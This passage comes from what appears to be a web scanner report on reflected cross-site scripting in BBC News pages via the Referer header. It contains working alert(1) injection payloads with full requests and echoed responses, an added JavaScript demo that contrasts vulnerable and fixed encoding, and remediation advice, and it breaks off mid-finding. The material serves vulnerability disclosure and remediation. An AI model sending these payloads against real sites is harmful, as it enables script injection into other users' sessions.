Keep-Alive: timeout=10, max=677
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=54edf5f5ae0ae5dacb386a2041646433786dff49a06071a98b7b63efebe4723e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54edf5f5ae0ae5dacb386a2041646433786dff49a06071a98b7b63efebe4723e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ae0f0'-alert(1)-'1e57d02e1e9',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434453',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.62. http://www.bbc.co.uk/news/business-12435838 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fadb1'-alert(1)-'6267cade542 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fadb1'-alert(1)-'6267cade542

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=04fdd5255ecac5eabbda24652124692f3bdf7eab70e0b1293baba3af77a48af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04fdd5255ecac5eabbda24652124692f3bdf7eab70e0b1293baba3af77a48af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fadb1'-alert(1)-'6267cade542',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435838',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.63. http://www.bbc.co.uk/news/business-12437194 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1159'-alert(1)-'ddc4023677b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f1159'-alert(1)-'ddc4023677b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad85254ecaa59cab39b1a9718b7c44bd1593170020e17a049b3a453b313c1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad85254ecaa59cab39b1a9718b7c44bd1593170020e17a049b3a453b313c1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=f1159'-alert(1)-'ddc4023677b',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437194',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.64. http://www.bbc.co.uk/news/education-12429152 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf33b'-alert(1)-'b67915982bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cf33b'-alert(1)-'b67915982bf

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=94edf5c55eaae5bda9352015c1a34de86c086097c030f10f9289609ce6e0c7960Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94edf5c55eaae5bda9352015c1a34de86c086097c030f10f9289609ce6e0c7960Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=cf33b'-alert(1)-'b67915982bf',
       section: 'education',
       sectionPath: '/Education',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429152',
       assetType: 'story',
       uri: '/news/educati
...[SNIP]...

1.65. http://www.bbc.co.uk/news/entertainment-arts-12426999 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb150'-alert(1)-'8c6666b86a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb150'-alert(1)-'8c6666b86a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=04bdb5f5fefa05acba38f81fb1a3ea0f672f862030d081eaa44b7ab5922105440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04bdb5f5fefa05acba38f81fb1a3ea0f672f862030d081eaa44b7ab5922105440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fb150'-alert(1)-'8c6666b86a',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12426999',
       assetType: 'stor
...[SNIP]...

1.66. http://www.bbc.co.uk/news/entertainment-arts-12427905 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 6a62b'-alert(1)-'2d57314ef7 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a62b'-alert(1)-'2d57314ef7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24cd25c59e2ae5ac2af8885d714119391e81b986d070b17a84fb7a2512b1c5b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd25c59e2ae5ac2af8885d714119391e81b986d070b17a84fb7a2512b1c5b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6a62b'-alert(1)-'2d57314ef7',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427905',
       assetType: 'stor
...[SNIP]...
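The following is an added example, not code from this report or from bbc.co.uk. It reproduces the context the findings above describe: a Referer value that is HTML-entity-encoded (so & becomes &amp;) and then placed inside a single-quoted JavaScript string literal in an inline script, as in the bbc.fmtj.page literal visible in the responses. It shows that the quote-breakout payload executes under that encoding, that a JavaScript-string-aware encoder stops both the quote breakout and a </script> breakout while leaving the value intact, and it uses a stub alert as a stand-in for the browser running the script. The function names (htmlEncodeNoQuotes, jsStringEscape, renderVulnerable, renderFixed, executeInlineScript) and the sample Referer strings are assumptions constructed for the example.

```javascript
// Added example; not code from the scanner report or from bbc.co.uk.
// Function names are hypothetical; the rendered literal mirrors the
// bbc.fmtj.page object seen in the responses above.

// The encoder the responses appear to use: entities for &, <, > while the
// single quote passes through untouched.
function htmlEncodeNoQuotes(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Context-correct encoder for a value placed inside a <script> block: JSON
// encoding yields a valid JS string literal (quotes and backslashes escaped),
// and <, >, & plus the JS line terminators U+2028/U+2029 are further written
// as \uXXXX escapes, so the output can never contain </script> or <!--.
function jsStringEscape(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Vulnerable rendering (mirrors the page): HTML-encoded value dropped between
// quotes that the template itself supplies.
function renderVulnerable(referrer) {
  return "bbc.fmtj.page = {\n" +
         "  referrer: '" + htmlEncodeNoQuotes(referrer) + "',\n" +
         "  section: 'health'\n" +
         "};";
}

// Hardened rendering: the encoder emits the complete literal, quotes included.
function renderFixed(referrer) {
  return "bbc.fmtj.page = {\n" +
         "  referrer: " + jsStringEscape(referrer) + ",\n" +
         "  section: 'health'\n" +
         "};";
}

// Stand-in for the browser executing the inline script: runs the generated
// code with a stub bbc namespace and a stub alert, then reports whether alert
// fired and what value the referrer property ended up holding.
function executeInlineScript(script) {
  let alerted = false;
  const bbc = { fmtj: {} };
  const run = new Function('bbc', 'alert', script);
  run(bbc, () => { alerted = true; });
  return { alerted, referrer: bbc.fmtj.page.referrer };
}

// Constructed sample Referer values (not captured traffic): the quote-breakout
// pattern used in the report, and a tag breakout that HTML encoding alone
// would have stopped but that a JS-string encoder must also stop.
const REFERER_QUOTE = "http://www.google.com/search?hl=en&q=67c84'-alert(1)-'f9343208b67";
const REFERER_TAG = "http://example.test/?q=</script><script>alert(1)</script>";

function demo() {
  const vuln = executeInlineScript(renderVulnerable(REFERER_QUOTE));   // alert fires
  const fixed = executeInlineScript(renderFixed(REFERER_QUOTE));       // no alert, value intact
  const fixedTagOutput = renderFixed(REFERER_TAG);
  return {
    vulnAlerted: vuln.alerted,
    fixedAlerted: fixed.alerted,
    fixedReferrerIntact: fixed.referrer === REFERER_QUOTE,
    fixedTagSafe: !/<\/script/i.test(fixedTagOutput),
    fixedTagValueIntact: executeInlineScript(fixedTagOutput).referrer === REFERER_TAG,
  };
}

console.log(demo());
```

In the vulnerable path the generated statement reads referrer: '...q=67c84'-alert(1)-'f9343208b67', which the engine parses as a string minus alert(1) minus a string; the stub alert is called and the property ends up as NaN. In the fixed path JSON encoding keeps the quote inside the literal and the \u0026 and \u003c escapes keep & and < out of the HTML entirely, so the property holds the original Referer unchanged.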

1.67. http://www.bbc.co.uk/news/entertainment-arts-12428196 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 1411c'-alert(1)-'c4ddf7bcf5f was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1411c'-alert(1)-'c4ddf7bcf5f

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=348d5525fe8a65cd58cd6b01812ee87b2501fb94a0102273377d9ae055b32a0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d5525fe8a65cd58cd6b01812ee87b2501fb94a0102273377d9ae055b32a0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1411c'-alert(1)-'c4ddf7bcf5f',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428196',
       assetType: 'stor
...[SNIP]...

1.68. http://www.bbc.co.uk/news/health-12401970 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 67c84'-alert(1)-'f9343208b67 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=67c84'-alert(1)-'f9343208b67

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=94ddf565beaa15cd2a08472e61ca10d73865b8abc080a189bb0b92cc8d856fac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ddf565beaa15cd2a08472e61ca10d73865b8abc080a189bb0b92cc8d856fac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=67c84'-alert(1)-'f9343208b67',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12401970',
       assetType: 'story',
       uri: '/news/health-124019
...[SNIP]...

1.69. http://www.bbc.co.uk/news/health-12409700 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 4048b'-alert(1)-'9c5111a9e23 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4048b'-alert(1)-'9c5111a9e23

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=a42dc5e56eba959dab7a67ebf1488c9b818c022110c0a1da64bbcaf4501ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a42dc5e56eba959dab7a67ebf1488c9b818c022110c0a1da64bbcaf4501ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4048b'-alert(1)-'9c5111a9e23',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12409700',
       assetType: 'story',
       uri: '/news/health-124097
...[SNIP]...

1.70. http://www.bbc.co.uk/news/health-12415801 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

